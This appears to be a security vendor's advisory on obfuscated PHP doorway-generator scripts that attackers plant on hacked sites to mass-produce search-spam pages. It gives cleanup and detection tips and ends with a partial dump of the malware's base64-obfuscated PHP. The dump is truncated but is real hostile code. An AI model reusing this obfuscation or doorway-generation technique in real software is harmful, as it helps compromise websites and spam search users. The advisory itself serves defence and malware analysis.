Every now and then we see how hackers use compromised sites in black hat SEO campaigns. Quite often we see how they create whole subsections of spammy or malicious doorways (hundreds or even thousands)
under an umbrella of a legitimate reputable domain name. To rank well, doorways should have unique content. Another reason for having unique content is targeting long tail search requests - if only your page
has a specific combination of keywords, then it will be on the first page of search results for those keywords. Given the volume of searches on major search engines (billions of searches every days) and millions
of doorways accross multiple hacked sites, long tail queries may produce significant traffic for spammers. The question is how a small group of hackers can generate millions of pages with unique conten in a very short time?
The answer is they use doorway generating scripts (doorway generators). Such scripts usually make random requests to google, parse descriptions from top results, mix them randomly and intersperse them
with hotlinked images from image search results for the same queries. Most doorways generators can create new doorways on the fly if some keywords don't have cached spammy pages.
In most cases, doorway scripts are heavily obfuscated.
Affecting
Any servers with enabled PHP
Cleanup
Delete the doorway PHP script and scan your server for other types of malware and specifically for backdoors. In most cases you will find subdirectories full of encrypted or unencrypted
cached doorways and configuration files next to the doorway generator scripts. Such directories usualy have names like "logs", "tmp", or begin with a period such as ".tmp".
It is important to detect doorways as soon as possible as they may incur penalties from search engines and may significantly increase server load.
To detect them, you should monitor queries that send traffic to your site (use Google Webmaster Tools, don't rely on Google Analytics it doesn't track as doorways that don't contain your GA code.).
Check list of indexed pages (again in Webmaster Tools) and try to search your sites for typical spammy keywords such as "viagra", "payday loans", "casino", "luxary", etc.
You can also sign up with us and let our team remove the malware for you.
Dump
...
$GLOBALS['_46594030_']=Array(base64_decode('ZXJ' .'yb3Jfc' .'mVwb3' .'J0a' .'W' .'5n'),base64_decode('' .'aW5pX' .'3Nl' .'d' .'A=='),base64_decode('' .'c3' .'Ryc' .'G9z'),base64_decode('' .'c3Ry' .'X3JlcGxhY' .'2' .'U='),base64_decode('ZnVuY3Rp' .'b25fZX' .'h' .'pc3R' .'z'),
...
function _196006234($i){$a=Array('YWxsb3dfdXJsX2ZvcGVu','bGlua3M=','cGFnZWlt','cGFnZWlt','OQ==','UEhQX1NFTEY=','d3AtaW1hZ2UucGhw','PCEtLSBjb3VudGVkIGluIA==','PCEtLSBXcm9uZyBwYXJhbWV0ZXIhIC0tPg==','PCEtLSBNaXNzZWQgcGFyYW1ldGVyISAtLT4=','Cg==','IA==','','','ZmlsZQ==',...return base64_decode($a[$i]);} ?><?php $GLOBALS['_46594030_'][0](round(0));@$GLOBALS['_46594030_'][1](_196006234(0),round(0+0.25+0.25+0.25+0.25));
...
function l__6($_24,$_25){return $GLOBALS['_46594030_'][62]($GLOBALS['_46594030_'][63]($_24),$GLOBALS['_46594030_'][64]($_25));}